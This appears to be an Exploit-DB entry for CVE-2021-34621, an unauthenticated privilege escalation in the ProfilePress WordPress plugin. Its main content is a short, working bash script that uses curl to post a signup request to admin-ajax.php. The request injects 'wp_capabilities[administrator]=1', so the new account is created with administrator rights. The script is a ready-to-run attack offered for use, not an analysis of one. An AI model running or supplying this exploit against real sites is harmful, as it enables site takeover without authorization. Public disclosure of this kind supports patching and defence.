WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)

EDB-ID:

50242




Platform:

PHP

Date:

2021-08-31


# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
# Date: 23-08-2021
# Exploit Author: Numan Rajkotiya
# Vendor Homepage: https://profilepress.net/
# Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip
# Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.13
	   [2] WordPress 4.7 or higher
# Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928
# CVE : CVE-2021-34621

#!/bin/bash

# Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3 
# Change the name and password as per your requirement.

URL=$1

curl -X POST $URL"/wp-admin/admin-ajax.php" \
 -H "Content-Type: application/x-www-form-urlencoded" \
 -d "reg_username=numan" \
 -d "reg_email=pwned@numan.com" \
 -d "reg_password=numan" \
 -d "reg_password_present=true" \
 -d "wp_capabilities[administrator]=1" \
 -d "reg_first_name=pwned" \
 -d "reg_last_name=numan" \
 -d "action=pp_ajax_signup"